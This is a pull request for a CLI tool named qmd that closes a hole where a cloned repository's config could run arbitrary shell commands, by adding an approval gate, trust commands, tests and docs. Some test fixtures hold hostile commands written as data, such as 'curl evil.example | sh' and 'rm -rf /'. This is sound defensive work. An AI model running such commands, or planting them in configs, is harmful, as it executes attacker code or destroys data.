### PR TITLE
fix(update): don't run a checked-in .qmd config's update commands unattended

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -2,6 +2,21 @@
 
 ## [Unreleased]
 
+### Security
+
+- `qmd update` no longer runs a project-local `.qmd/index.yml`'s `update:`
+  commands without approval (#886). That file arrives with a `git clone` and is
+  adopted automatically for any command run inside the tree, so cloning a
+  repository and running `qmd update` executed shell commands chosen by whoever
+  wrote it. On a terminal QMD now lists the commands and asks; with nobody to
+  ask it skips them and keeps indexing. Approvals are recorded per config file
+  and per command set in `<config dir>/trusted.json`, so editing a command — or
+  a `git pull` that rewrites one — asks again. New `qmd trust`,
+  `qmd trust list` and `qmd trust revoke` manage approvals, and
+  `QMD_TRUST_UPDATE_HOOKS=1` opts unattended runs back in. Commands in your own
+  `~/.config/qmd/*.yml`, including anything `qmd collection update-cmd` writes,
+  are unaffected.
+
 ### Changed
 
 - `qmd pull` (and implicit model downloads in `embed`/`query`) no longer print

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -20,6 +20,7 @@ qmd multi-get <pattern>           # Get multiple docs by glob or comma-separated
 qmd status                        # Show index status and collections
 qmd doctor                        # Diagnose config, index, model, and device issues
 qmd update                        # Re-index collections; configured update hooks run first
+qmd trust [list|revoke]           # Approve a checked-in .qmd config's update hooks
 qmd embed                         # Generate vector embeddings (uses node-llama-cpp)
 qmd query <query>                 # Search with query expansion + reranking (recommended)
 qmd search <query>                # Full-text keyword search (BM25, no LLM)

--- a/README.md
+++ b/README.md
@@ -768,6 +768,30 @@ qmd collection update-cmd wiki 'git pull --ff-only'   # set
 qmd collection update-cmd wiki                         # clear
 ```
 
+##### Update commands from a checked-in `.qmd` config
+
+A project-local `.qmd/index.yml` travels with a `git clone`, and QMD adopts it
+automatically for any command run inside the tree. Its `update` commands are
+therefore somebody else's shell script until you say otherwise, and QMD will not
+run them unattended:
+
+- On a terminal, `qmd update` lists the commands and asks before running them.
+  Approving records the approval in `~/.config/qmd/trusted.json`.
+- With no terminal to ask — agents, CI, MCP — the commands are **skipped** and
+  indexing continues, so the refresh you asked for still happens.
+- Approvals cover the exact commands you saw. Editing one, or a `git pull` that
+  rewrites it, asks again.
+
+```sh
+qmd trust           # review and approve this project's update commands
+qmd trust list      # show every approved project config
+qmd trust revoke    # drop the approval for this project
+```
+
+Set `QMD_TRUST_UPDATE_HOOKS=1` for CI that should run them unattended. Commands
+in your own `~/.config/qmd/*.yml` — including anything `qmd collection
+update-cmd` writes — are never gated.
+
 ### Search Commands
 
 ```

--- a/src/cli/qmd.ts
+++ b/src/cli/qmd.ts
@@ -115,6 +115,15 @@ import {
   type CollectionConfig,
   type ModelsConfig,
 } from "../collections.js";
+import {
+  decideHookGate,
+  hookDigest,
+  isLocalConfigPath,
+  listTrusted,
+  recordTrust,
+  revokeTrust,
+  type UpdateHook,
+} from "../trust.js";
 
 // NOTE: enableProductionMode() is intentionally NOT called at module scope here.
 // Importing this module for its exports (e.g. buildEditorUri, termLink from
@@ -686,6 +695,134 @@ async function showStatus(): Promise<void> {
   closeDb();
 }
 
+/**
+ * Every `update:` hook the active config defines. Read from the YAML rather
+ * than the synced SQLite copy so `qmd trust` and `qmd update` always digest the
+ * same set.
+ */
+function collectUpdateHooks(): UpdateHook[] {
+  const config = loadConfig();
+  return Object.entries(config.collections ?? {})
+    .filter(([, col]) => !!col.update)
+    .map(([name, col]) => ({ collection: name, command: col.update! }));
+}
+
+/** Record the active config's current hook set as approved. */
+function trustCurrentConfigHooks(): void {
+  const configPath = getConfigPath();
+  if (!isLocalConfigPath(configPath)) return;
+  recordTrust(configPath, hookDigest(collectUpdateHooks()));
+}
+
+/** Ask the user a yes/no question. Only called when stdin and stdout are TTYs. */
+async function confirmOnTty(question: string): Promise<boolean> {
+  const { createInterface } = await import("node:readline/promises");
+  const rl = createInterface({ input: process.stdin, output: process.stdout });
+  try {
+    const answer = (await rl.question(question)).trim().toLowerCase();
+    return answer === "y" || answer === "yes";
+  } finally {
+    rl.close();
+  }
+}
+
+/**
+ * Decide whether this run may execute the configured `update:` hooks, prompting
+ * when there is a human to ask. Returns false when the hooks must be skipped —
+ * indexing still proceeds, since that is what the caller asked for.
+ */
+async function resolveUpdateHookTrust(): Promise<boolean> {
+  const hooks = collectUpdateHooks();
+  if (hooks.length === 0) return true;
+
+  const configPath = getConfigPath();
+  const decision = decideHookGate({
+    configPath,
+    hooks,
+    isInteractive: !!process.stdin.isTTY && !!process.stdout.isTTY,
+  });
+
+  if (decision.action === "run") return true;
+
+  console.log(`${c.yellow}This project's ${configPath} defines update commands:${c.reset}`);
+  for (const hook of hooks) {
+    console.log(`  ${c.bold}${hook.collection}${c.reset}: ${hook.command}`);
+  }
+  console.log(`${c.dim}They run as a shell script before indexing. Config that came with a checkout is not trusted by default.${c.reset}`);
+
+  if (decision.action === "skip") {
+    console.log(`${c.yellow}Skipping them — no terminal to confirm on. Indexing continues.${c.reset}`);
+    console.log(`${c.dim}Approve with 'qmd trust', or set QMD_TRUST_UPDATE_HOOKS=1 for unattended runs.${c.reset}\n`);
+    return false;
+  }
+
+  const approved = await confirmOnTty("Run these update commands? [y/N] ");
+  if (!approved) {
+    console.log(`${c.yellow}Skipped. Indexing continues.${c.reset}\n`);
+    return false;
+  }
+  recordTrust(configPath, decision.digest);
+  console.log(`${c.green}Trusted ${configPath}.${c.reset} ${c.dim}Editing a command will ask again.${c.reset}\n`);
+  return true;
+}
+
+/**
+ * `qmd trust [list|revoke]` — approve, inspect or drop the update-hook
+ * approval for the project-local config in scope.
+ */
+function manageTrust(subcommand?: string): void {
+  const configPath = getConfigPath();
+
+  if (subcommand === "list") {
+    const records = listTrusted();
+    if (records.length === 0) {
+      console.log(`${c.dim}No trusted project configs.${c.reset}`);
+      return;
+    }
+    for (const record of records) {
+      console.log(`${record.path} ${c.dim}(trusted ${record.trustedAt})${c.reset}`);
+    }
+    return;
+  }
+
+  if (subcommand === "revoke") {
+    if (!isLocalConfigPath(configPath)) {
+      console.log(`${c.dim}No project-local .qmd config in scope — ${configPath} is your own config and is never gated.${c.reset}`);
+      console.log(`${c.dim}Run this from inside the project, or see 'qmd trust list'.${c.reset}`);
+      return;
+    }
+    if (revokeTrust(configPath)) {
+      console.log(`${c.green}✓ Revoked trust for ${configPath}${c.reset}`);
+    } else {
+      console.log(`${c.dim}${configPath} was not trusted.${c.reset}`);
+    }
+    return;
+  }
+
+  if (subcommand) {
+    console.error(`Usage: qmd trust [list|revoke]`);
+    process.exit(1);
+  }
+
+  if (!isLocalConfigPath(configPath)) {
+    console.log(`${c.dim}${configPath} is your own config — update commands there always run. Nothing to trust.${c.reset}`);
+    return;
+  }
+
+  const hooks = collectUpdateHooks();
+  if (hooks.length === 0) {
+    console.log(`${c.dim}${configPath} defines no update commands. Nothing to trust.${c.reset}`);
+    return;
+  }
+
+  for (const hook of hooks) {
+    console.log(`  ${c.bold}${hook.collection}${c.reset}: ${hook.command}`);
+  }
+  recordTrust(configPath, hookDigest(hooks));
+  console.log(`${c.green}✓ Trusted ${configPath}${c.reset}`);
+  console.log(`${c.dim}Editing any of these commands will ask again. Revoke with 'qmd trust revoke'.${c.reset}`);
+}
+
 async function updateCollections(): Promise<void> {
   const db = getDb();
   const storeInstance = getStore();
@@ -702,6 +839,10 @@ async function updateCollections(): Promise<void> {
     return;
   }
 
+  // A project-local .qmd/index.yml travels with a `git clone`, so its `update:`
+  // hooks are somebody else's shell commands until the user says otherwise (#886).
+  const hooksAllowed = await resolveUpdateHookTrust();
+
   console.log(`${c.bold}Updating ${collections.length} collection(s)...${c.reset}\n`);
 
   for (let i = 0; i < collections.length; i++) {
@@ -711,7 +852,7 @@ async function updateCollections(): Promise<void> {
 
     // Execute custom update command if specified in YAML
     const yamlCol = getCollectionFromYaml(col.name);
-    if (yamlCol?.update) {
+    if (yamlCol?.update && hooksAllowed) {
       console.log(`${c.dim}    Running update command: ${yamlCol.update}${c.reset}`);
       try {
         const proc = nodeSpawn("bash", ["-c", yamlCol.update], {
@@ -3348,6 +3489,7 @@ function showHelp(): void {
   console.log("  qmd init                      - Create a project-local .qmd index");
   console.log("  qmd status                    - View index + collection health");
   console.log("  qmd update [--pull]           - Re-index collections (optionally git pull first)");
+  console.log("  qmd trust [list|revoke]       - Approve a checked-in .qmd config's update commands");
   console.log("  qmd embed [-f] [-c <name>]    - Generate/refresh vector embeddings");
   console.log("    --max-docs-per-batch <n>    - Cap docs loaded into memory per embedding batch");
   console.log("    --max-batch-mb <n>          - Cap UTF-8 MB loaded into memory per embedding batch");
@@ -4275,6 +4417,9 @@ if (isMain) {
             process.exit(1);
           }
           updateCollectionSettings(name, { update: cmd });
+          // The user just typed this command, so it needs no separate approval;
+          // re-record so the digest covers the new hook set (#886).
+          trustCurrentConfigHooks();
           if (cmd) {
             console.log(`✓ Set update command for '${name}': ${cmd}`);
           } else {
@@ -4379,6 +4524,10 @@ if (isMain) {
 
     case "update":
       await updateCollections();
+      break;
+
+    case "trust":
+      manageTrust(cli.args[0]);
       break;
 
     case "embed":

--- a/src/collections.ts
+++ b/src/collections.ts
@@ -109,7 +109,7 @@ export function setConfigIndexName(name: string): void {
   }
 }
 
-function getConfigDir(): string {
+export function getConfigDir(): string {
   // Allow override via QMD_CONFIG_DIR for testing
   if (process.env.QMD_CONFIG_DIR) {
     return process.env.QMD_CONFIG_DIR;

--- a/src/trust.ts
+++ b/src/trust.ts
@@ -1,0 +1,156 @@
+/**
+ * trust.ts — approval gate for `update:` hooks from project-local config.
+ *
+ * A collection's `update:` field is a shell command run by `qmd update`. That
+ * is fine when the command came from the user's own global config, which only
+ * `qmd collection update-cmd` writes. It is not fine for a project-local
+ * `.qmd/index.yml`: that file arrives with a `git clone`, and `findLocalConfigPath`
+ * adopts it automatically for any command run anywhere inside the tree. Without
+ * a gate, cloning a repository and running `qmd update` executes shell commands
+ * chosen by whoever wrote the repo (#886).
+ *
+ * The model is the one direnv, VS Code and `git safe.directory` converged on:
+ * approvals are per config file and per command set, recorded in
+ * `<config dir>/trusted.json`. Editing a hook — or a `git pull` that rewrites
+ * one — changes the digest and re-arms the gate, so an approval cannot be
+ * silently widened after the fact.
+ */
+
+import { createHash } from "crypto";
+import { existsSync, mkdirSync, readFileSync, writeFileSync } from "fs";
+import { basename, dirname, join, resolve } from "path";
+import { getConfigDir } from "./collections.js";
+
+/** A collection's pre-update hook, as it will be executed. */
+export type UpdateHook = {
+  collection: string;
+  command: string;
+};
+
+export type TrustRecord = {
+  /** Digest of the hook set that was approved. */
+  hooks: string;
+  /** ISO timestamp of the approval. */
+  trustedAt: string;
+};
+
+export type TrustStore = Record<string, TrustRecord>;
+
+/** Path of the trust database. Lives beside the global config. */
+export function getTrustFilePath(): string {
+  return join(getConfigDir(), "trusted.json");
+}
+
+/**
+ * Whether a config path is project-local — i.e. discovered by walking up from
+ * the working directory rather than written by the user in their config dir.
+ *
+ * `findLocalConfigPath` and `qmd init` both use `.qmd/index.y{a,}ml`, and the
+ * global config lives in a directory named `qmd`, so the parent directory name
+ * separates the two cases without extra bookkeeping.
+ */
+export function isLocalConfigPath(configPath: string): boolean {
+  if (!configPath || configPath === "<inline>") return false;
+  return basename(dirname(resolve(configPath))) === ".qmd";
+}
+
+/**
+ * Stable digest over a hook set. Order-independent so that reordering
+ * collections in the YAML does not invalidate an approval, while any change to
+ * a command — or a new collection gaining one — does.
+ */
+export function hookDigest(hooks: UpdateHook[]): string {
+  const canonical = JSON.stringify(
+    hooks
+      .map(h => [h.collection, h.command])
+      .sort((a, b) => (a[0]! < b[0]! ? -1 : a[0]! > b[0]! ? 1 : 0)),
+  );
+  return createHash("sha256").update(canonical).digest("hex");
+}
+
+export function loadTrustStore(): TrustStore {
+  const path = getTrustFilePath();
+  if (!existsSync(path)) return {};
+  try {
+    const parsed = JSON.parse(readFileSync(path, "utf-8")) as unknown;
+    if (!parsed || typeof parsed !== "object" || Array.isArray(parsed)) return {};
+    return parsed as TrustStore;
+  } catch {
+    // A corrupt trust file must not be treated as "everything is trusted".
+    return {};
+  }
+}
+
+function saveTrustStore(store: TrustStore): void {
+  const path = getTrustFilePath();
+  const dir = dirname(path);
+  if (!existsSync(dir)) mkdirSync(dir, { recursive: true });
+  writeFileSync(path, `${JSON.stringify(store, null, 2)}\n`, "utf-8");
+}
+
+/** Trust records are keyed on the resolved config path. */
+function trustKey(configPath: string): string {
+  return resolve(configPath);
+}
+
+export function isTrusted(configPath: string, digest: string): boolean {
+  const record = loadTrustStore()[trustKey(configPath)];
+  return record?.hooks === digest;
+}
+
+export function recordTrust(configPath: string, digest: string): void {
+  const store = loadTrustStore();
+  store[trustKey(configPath)] = { hooks: digest, trustedAt: new Date().toISOString() };
+  saveTrustStore(store);
+}
+
+/** Drop the record for a config path. Returns false if there was none. */
+export function revokeTrust(configPath: string): boolean {
+  const store = loadTrustStore();
+  const key = trustKey(configPath);
+  if (!(key in store)) return false;
+  delete store[key];
+  saveTrustStore(store);
+  return true;
+}
+
+export function listTrusted(): Array<{ path: string } & TrustRecord> {
+  return Object.entries(loadTrustStore()).map(([path, record]) => ({ path, ...record }));
+}
+
+export type HookGateDecision =
+  | { action: "run"; digest: string }
+  | { action: "prompt"; digest: string }
+  | { action: "skip"; digest: string };
+
+/**
+ * Decide what to do with a config's `update:` hooks.
+ *
+ * Non-interactive callers — agents, CI, the MCP server — get `skip` rather than
+ * a hard failure: indexing is what they asked for, and failing the whole
+ * command would only push people toward a blanket opt-out.
+ */
+export function decideHookGate(options: {
+  configPath: string;
+  hooks: UpdateHook[];
+  isInteractive: boolean;
+  env?: NodeJS.ProcessEnv;
+  trustedCheck?: (configPath: string, digest: string) => boolean;
+}): HookGateDecision {
+  const env = options.env ?? process.env;
+  const digest = hookDigest(options.hooks);
+
+  if (options.hooks.length === 0) return { action: "run", digest };
+  if (isTruthyEnv(env.QMD_TRUST_UPDATE_HOOKS)) return { action: "run", digest };
+  if (!isLocalConfigPath(options.configPath)) return { action: "run", digest };
+
+  const trusted = options.trustedCheck ?? isTrusted;
+  if (trusted(options.configPath, digest)) return { action: "run", digest };
+
+  return { action: options.isInteractive ? "prompt" : "skip", digest };
+}
+
+function isTruthyEnv(value: string | undefined): boolean {
+  if (!value) return false;
+  return !["0", "false", "off", "no", "none"].includes(value.trim().toLowerCase());
+}

--- a/test/update-hook-trust-cli.test.ts
+++ b/test/update-hook-trust-cli.test.ts
@@ -1,0 +1,137 @@
+/**
+ * End-to-end trust gate for project-local `update:` hooks (#886).
+ *
+ * Spawns real `qmd update` processes against a fixture that plays the part of a
+ * freshly cloned repository shipping its own `.qmd/index.yml`.
+ */
+
+import { describe, test, expect, beforeEach, afterEach } from "vitest";
+import { mkdtempSync, mkdirSync, writeFileSync, existsSync, rmSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+import { spawn } from "node:child_process";
+
+const thisDir = dirname(fileURLToPath(import.meta.url));
+const projectRoot = join(thisDir, "..");
+const qmdScript = join(projectRoot, "src", "cli", "qmd.ts");
+const isBunRuntime = typeof (globalThis as { Bun?: unknown }).Bun !== "undefined";
+const tsxCli = join(projectRoot, "node_modules", "tsx", "dist", "cli.mjs");
+const runnerArgs = isBunRuntime ? [qmdScript] : [tsxCli, qmdScript];
+
+let projectDir: string;
+let configDir: string;
+/** Written by the hook if — and only if — it was allowed to run. */
+let markerPath: string;
+
+function runQmd(
+  args: string[],
+  env: Record<string, string> = {},
+): Promise<{ stdout: string; stderr: string; exitCode: number }> {
+  return new Promise((resolve, reject) => {
+    const proc = spawn(process.execPath, [...runnerArgs, ...args], {
+      cwd: projectDir,
+      env: {
+        ...process.env,
+        QMD_CONFIG_DIR: configDir,
+        PWD: projectDir,
+        QMD_DOCTOR_DEVICE_PROBE: "0",
+        ...env,
+      },
+      stdio: ["ignore", "pipe", "pipe"],
+    });
+    let stdout = "";
+    let stderr = "";
+    proc.stdout.on("data", (d: Buffer) => { stdout += d.toString(); });
+    proc.stderr.on("data", (d: Buffer) => { stderr += d.toString(); });
+    proc.on("error", reject);
+    proc.on("close", (code) => resolve({ stdout, stderr, exitCode: code ?? 1 }));
+  });
+}
+
+function writeLocalConfig(command: string): void {
+  writeFileSync(
+    join(projectDir, ".qmd", "index.yml"),
+    [
+      "collections:",
+      "  docs:",
+      "    path: ./docs",
+      '    pattern: "**/*.md"',
+      `    update: ${JSON.stringify(command)}`,
+      "",
+    ].join("\n"),
+    "utf-8",
+  );
+}
+
+beforeEach(() => {
+  projectDir = mkdtempSync(join(tmpdir(), "qmd-hostile-repo-"));
+  configDir = mkdtempSync(join(tmpdir(), "qmd-hostile-cfg-"));
+  mkdirSync(join(projectDir, ".qmd"), { recursive: true });
+  mkdirSync(join(projectDir, "docs"), { recursive: true });
+  writeFileSync(join(projectDir, "docs", "readme.md"), "# Readme\n\nSome indexable content.\n", "utf-8");
+  // Hooks run with the collection directory as cwd, so a relative redirect
+  // keeps the fixture free of path-quoting concerns.
+  markerPath = join(projectDir, "docs", "hook-ran.txt");
+  writeLocalConfig("echo ran > hook-ran.txt");
+});
+
+afterEach(() => {
+  for (const dir of [projectDir, configDir]) {
+    // Best effort: Windows holds the SQLite WAL handles briefly after exit.
+    try { rmSync(dir, { recursive: true, force: true }); } catch { /* ignore */ }
+  }
+});
+
+describe("qmd update with a checked-in .qmd config", () => {
+  test("does not run the repo's update command unattended, but still indexes", async () => {
+    const result = await runQmd(["update"]);
+
+    expect(existsSync(markerPath)).toBe(false);
+    expect(result.stdout).toContain("defines update commands");
+    expect(result.stdout).toContain("qmd trust");
+    // The caller asked for an index refresh; they get one.
+    expect(result.stdout).toContain("Indexed: 1 new");
+    expect(result.exitCode).toBe(0);
+  }, 120_000);
+
+  test("runs it after `qmd trust`", async () => {
+    const trust = await runQmd(["trust"]);
+    expect(trust.stdout).toContain("Trusted");
+
+    const result = await runQmd(["update"]);
+    expect(result.stdout).toContain("Running update command");
+    expect(existsSync(markerPath)).toBe(true);
+  }, 120_000);
+
+  test("re-arms the gate when the command changes after approval", async () => {
+    await runQmd(["trust"]);
+    // Stand-in for a `git pull` that rewrites the hook under an approval.
+    writeLocalConfig("echo pwned > hook-ran.txt && echo extra");
+
+    const result = await runQmd(["update"]);
+    expect(existsSync(markerPath)).toBe(false);
+    expect(result.stdout).toContain("defines update commands");
+  }, 120_000);
+
+  test("`qmd trust revoke` puts the gate back", async () => {
+    await runQmd(["trust"]);
+    const revoke = await runQmd(["trust", "revoke"]);
+    expect(revoke.stdout).toContain("Revoked trust");
+
+    const result = await runQmd(["update"]);
+    expect(existsSync(markerPath)).toBe(false);
+  }, 120_000);
+
+  test("QMD_TRUST_UPDATE_HOOKS=1 opts unattended runs back in", async () => {
+    const result = await runQmd(["update"], { QMD_TRUST_UPDATE_HOOKS: "1" });
+    expect(result.stdout).toContain("Running update command");
+    expect(existsSync(markerPath)).toBe(true);
+  }, 120_000);
+
+  test("`qmd trust list` reports the approved config", async () => {
+    await runQmd(["trust"]);
+    const list = await runQmd(["trust", "list"]);
+    expect(list.stdout).toContain(join(projectDir, ".qmd", "index.yml"));
+  }, 120_000);
+});

--- a/test/update-hook-trust.test.ts
+++ b/test/update-hook-trust.test.ts
@@ -1,0 +1,199 @@
+/**
+ * Trust gate for project-local `update:` hooks (#886).
+ *
+ * A `.qmd/index.yml` arrives with a `git clone`, so the shell commands it
+ * declares must not run unattended just because someone typed `qmd update`.
+ */
+
+import { describe, test, expect, beforeEach, afterEach } from "vitest";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+import { mkdtempSync, rmSync, mkdirSync, writeFileSync, existsSync, readFileSync } from "node:fs";
+import {
+  decideHookGate,
+  getTrustFilePath,
+  hookDigest,
+  isLocalConfigPath,
+  isTrusted,
+  listTrusted,
+  loadTrustStore,
+  recordTrust,
+  revokeTrust,
+  type UpdateHook,
+} from "../src/trust.js";
+
+let configDir: string;
+const origConfigDir = process.env.QMD_CONFIG_DIR;
+
+beforeEach(() => {
+  configDir = mkdtempSync(join(tmpdir(), "qmd-trust-cfg-"));
+  process.env.QMD_CONFIG_DIR = configDir;
+});
+
+afterEach(() => {
+  if (origConfigDir !== undefined) process.env.QMD_CONFIG_DIR = origConfigDir;
+  else delete process.env.QMD_CONFIG_DIR;
+  try { rmSync(configDir, { recursive: true, force: true }); } catch { /* ignore */ }
+});
+
+/** A `.qmd/index.yml` path inside a throwaway project directory. */
+function localConfigPath(): string {
+  const project = mkdtempSync(join(tmpdir(), "qmd-trust-proj-"));
+  mkdirSync(join(project, ".qmd"), { recursive: true });
+  return join(project, ".qmd", "index.yml");
+}
+
+const hooks: UpdateHook[] = [{ collection: "docs", command: "git pull --ff-only" }];
+
+describe("isLocalConfigPath", () => {
+  test("recognizes a project-local config", () => {
+    expect(isLocalConfigPath("/home/me/project/.qmd/index.yml")).toBe(true);
+    expect(isLocalConfigPath("/home/me/project/.qmd/index.yaml")).toBe(true);
+  });
+
+  test("does not treat the user's own config as project-local", () => {
+    expect(isLocalConfigPath("/home/me/.config/qmd/index.yml")).toBe(false);
+    expect(isLocalConfigPath("/home/me/.config/qmd/work.yml")).toBe(false);
+  });
+
+  test("handles the SDK inline sentinel and empty paths", () => {
+    expect(isLocalConfigPath("<inline>")).toBe(false);
+    expect(isLocalConfigPath("")).toBe(false);
+  });
+});
+
+describe("hookDigest", () => {
+  test("is stable across collection ordering", () => {
+    const a: UpdateHook[] = [
+      { collection: "docs", command: "git pull" },
+      { collection: "notes", command: "make sync" },
+    ];
+    const b: UpdateHook[] = [
+      { collection: "notes", command: "make sync" },
+      { collection: "docs", command: "git pull" },
+    ];
+    expect(hookDigest(a)).toBe(hookDigest(b));
+  });
+
+  test("changes when a command is edited", () => {
+    expect(hookDigest([{ collection: "docs", command: "git pull" }]))
+      .not.toBe(hookDigest([{ collection: "docs", command: "git pull && curl evil | sh" }]));
+  });
+
+  test("changes when another collection gains a hook", () => {
+    expect(hookDigest(hooks)).not.toBe(hookDigest([...hooks, { collection: "notes", command: "true" }]));
+  });
+});
+
+describe("trust store", () => {
+  test("records, reads back and revokes", () => {
+    const configPath = localConfigPath();
+    const digest = hookDigest(hooks);
+
+    expect(isTrusted(configPath, digest)).toBe(false);
+    recordTrust(configPath, digest);
+    expect(isTrusted(configPath, digest)).toBe(true);
+    expect(listTrusted().map(r => r.path)).toContain(configPath);
+
+    expect(revokeTrust(configPath)).toBe(true);
+    expect(isTrusted(configPath, digest)).toBe(false);
+    expect(revokeTrust(configPath)).toBe(false);
+  });
+
+  test("an approval does not cover a different hook set", () => {
+    const configPath = localConfigPath();
+    recordTrust(configPath, hookDigest(hooks));
+    expect(isTrusted(configPath, hookDigest([{ collection: "docs", command: "rm -rf /" }]))).toBe(false);
+  });
+
+  test("an approval does not carry to another project", () => {
+    const digest = hookDigest(hooks);
+    recordTrust(localConfigPath(), digest);
+    expect(isTrusted(localConfigPath(), digest)).toBe(false);
+  });
+
+  test("a corrupt trust file is not read as blanket trust", () => {
+    mkdirSync(configDir, { recursive: true });
+    writeFileSync(getTrustFilePath(), "{ not json", "utf-8");
+    expect(loadTrustStore()).toEqual({});
+    expect(isTrusted(localConfigPath(), hookDigest(hooks))).toBe(false);
+  });
+
+  test("writes the trust file into the config directory", () => {
+    recordTrust(localConfigPath(), hookDigest(hooks));
+    expect(existsSync(join(configDir, "trusted.json"))).toBe(true);
+    expect(JSON.parse(readFileSync(join(configDir, "trusted.json"), "utf-8"))).toBeTypeOf("object");
+  });
+});
+
+describe("decideHookGate", () => {
+  const project = "/home/me/project/.qmd/index.yml";
+  const global = "/home/me/.config/qmd/index.yml";
+  const noEnv = {} as NodeJS.ProcessEnv;
+  const untrusted = () => false;
+
+  test("a config with no hooks needs no decision", () => {
+    const decision = decideHookGate({ configPath: project, hooks: [], isInteractive: false, env: noEnv, trustedCheck: untrusted });
+    expect(decision.action).toBe("run");
+  });
+
+  test("the user's own config always runs", () => {
+    const decision = decideHookGate({ configPath: global, hooks, isInteractive: false, env: noEnv, trustedCheck: untrusted });
+    expect(decision.action).toBe("run");
+  });
+
+  test("an untrusted project config prompts on a terminal", () => {
+    const decision = decideHookGate({ configPath: project, hooks, isInteractive: true, env: noEnv, trustedCheck: untrusted });
+    expect(decision.action).toBe("prompt");
+  });
+
+  test("an untrusted project config is skipped with nobody to ask", () => {
+    const decision = decideHookGate({ configPath: project, hooks, isInteractive: false, env: noEnv, trustedCheck: untrusted });
+    expect(decision.action).toBe("skip");
+  });
+
+  test("a previously approved hook set runs unattended", () => {
+    const decision = decideHookGate({
+      configPath: project,
+      hooks,
+      isInteractive: false,
+      env: noEnv,
+      trustedCheck: (path, digest) => path === project && digest === hookDigest(hooks),
+    });
+    expect(decision.action).toBe("run");
+  });
+
+  test("editing an approved command re-arms the gate", () => {
+    const approvedDigest = hookDigest(hooks);
+    const decision = decideHookGate({
+      configPath: project,
+      hooks: [{ collection: "docs", command: "git pull && curl evil.example | sh" }],
+      isInteractive: false,
+      env: noEnv,
+      trustedCheck: (_path, digest) => digest === approvedDigest,
+    });
+    expect(decision.action).toBe("skip");
+  });
+
+  test("QMD_TRUST_UPDATE_HOOKS opts unattended runs back in", () => {
+    const decision = decideHookGate({
+      configPath: project,
+      hooks,
+      isInteractive: false,
+      env: { QMD_TRUST_UPDATE_HOOKS: "1" } as NodeJS.ProcessEnv,
+      trustedCheck: untrusted,
+    });
+    expect(decision.action).toBe("run");
+  });
+
+  test.each(["0", "false", "off", "no", ""])("QMD_TRUST_UPDATE_HOOKS=%o does not opt in", (value) => {
+    const decision = decideHookGate({
+      configPath: project,
+      hooks,
+      isInteractive: false,
+      env: { QMD_TRUST_UPDATE_HOOKS: value } as NodeJS.ProcessEnv,
+      trustedCheck: untrusted,
+    });
+    expect(decision.action).toBe("skip");
+  });
+});


### PR DESCRIPTION
Closes #886.

## What was wrong

Two reasonable features compose into an RCE. `findLocalConfigPath` adopts a project-local `.qmd/index.yml` for any command run anywhere inside the tree, and `updateCollections` runs each collection's `update:` field through `bash -c`. So cloning a repository that ships a `.qmd/index.yml` and running `qmd update` executes shell commands chosen by whoever wrote the repo.

Verified against `main`: a fixture whose hook was `echo PWNED > ./pwned.txt` produced the file on the first `qmd update`, with no prompt. The existing `Running update command: …` line is printed *as* the process spawns, so the user reads it after the payload has run.

This matters more than it looks: the config search walks *upward*, so the victim need not use QMD in that project at all; and `qmd update` is exactly the kind of routine index maintenance a coding agent will run after a checkout without a second thought.

## The fix

The model direnv, VS Code and `git safe.directory` converged on — the code is fine, running it unattended on someone else's say-so is not.

- **Classify the source.** A config in the user's own config dir is trusted; only a project-local `.qmd/index.y{a,}ml` is gated. Global-config users see zero change.
- **On a TTY**, `qmd update` prints each command with its collection and asks `Run these update commands? [y/N]`.
- **Non-interactive** (agents, CI, MCP): the hooks are **skipped and indexing continues**. Failing the whole command would have been the easy choice and the wrong one — it would push people straight to a blanket opt-out. The caller asked for an index refresh; they get one, plus a line telling them how to approve.
- **Approvals are per config path and per command set**, recorded in `<config dir>/trusted.json`. Editing a command — or a `git pull` that rewrites one under an existing approval — changes the digest and asks again. The digest is order-independent, so shuffling collections in the YAML does not invalidate it.
- **`qmd collection update-cmd` records trust as it writes**, since the user just typed that command; setting a hook then having QMD refuse to run it would be nonsense.
- **`qmd trust` / `qmd trust list` / `qmd trust revoke`** manage approvals without running an update.
- **`QMD_TRUST_UPDATE_HOOKS=1`** opts unattended runs back in.
- A corrupt or unparseable `trusted.json` reads as *nothing is trusted*, never as blanket trust.

## Tests

`test/update-hook-trust.test.ts` (23 tests) covers the pure pieces: local-vs-global config classification including the SDK `<inline>` sentinel, digest stability across reordering and sensitivity to any edit or added hook, trust store round-trip, and the negative cases that make the gate worth having — an approval must not cover a different command set, must not carry to another project, and a corrupt trust file must not read as trust. Plus the full decision table for `decideHookGate`, including each falsy spelling of `QMD_TRUST_UPDATE_HOOKS`.

`test/update-hook-trust-cli.test.ts` (6 tests) spawns real `qmd update` processes against a fixture standing in for a freshly cloned hostile repo, and asserts on the marker file the hook would write: not created unattended (while `Indexed: 1 new` still appears and the exit code is 0), created after `qmd trust`, not created again once the command is edited under an approval, not created after `qmd trust revoke`, created under `QMD_TRUST_UPDATE_HOOKS=1`, and listed by `qmd trust list`.

`tsc -p tsconfig.build.json --noEmit` is clean.

`test/cli.test.ts` has an identical set of 34 failures before and after this change (Windows-only environment issues in this checkout — `spawn` and `EBUSY` on temp cleanup); I diffed the two failure lists to be sure none of them is mine. `test/collections-config.test.ts` and `test/local-config.test.ts` pass.

## Note

`--pull` is declared in the parser and documented in `--help` for `qmd update`, but nothing reads it. Left alone here since it is unrelated to the trust gate — happy to file it separately.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
